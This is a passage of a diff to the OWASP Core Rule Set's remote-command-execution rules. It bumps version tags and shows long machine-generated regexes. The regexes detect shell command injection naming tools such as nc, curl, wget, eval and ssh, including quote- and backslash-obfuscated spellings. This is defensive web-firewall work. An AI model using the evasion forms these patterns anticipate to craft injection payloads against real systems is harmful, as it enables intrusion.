?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \ "id:932231,\ phase:2,\ block,\ @@ -1000,7 +1072,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1033,7 +1105,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(. tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1089,7 +1161,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.932200_matched_var_name=%{matched_var_name}',\ chain" @@ -1128,7 +1200,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^#]+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.932205_matched_var_name=%{matched_var_name}',\ chain" @@ -1171,7 +1243,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\* tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.932206_matched_var_name=%{matched_var_name}',\ chain" @@ -1213,7 +1285,7 @@ SecRule REQUEST_HEADERS:Referer "@rx #.*" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.932207_matched_var_name=%{matched_var_name}',\ chain" @@ -1237,7 +1309,7 @@ SecRule REQUEST_HEADERS:Referer "@rx #.*" \ # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932220 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cdgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:p|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[gu]|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|[co][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|l)|(?:v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[bx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))(?:[\s\x0b&\),<>\|]|$).*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|\}]|$){1,10})|(?:(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*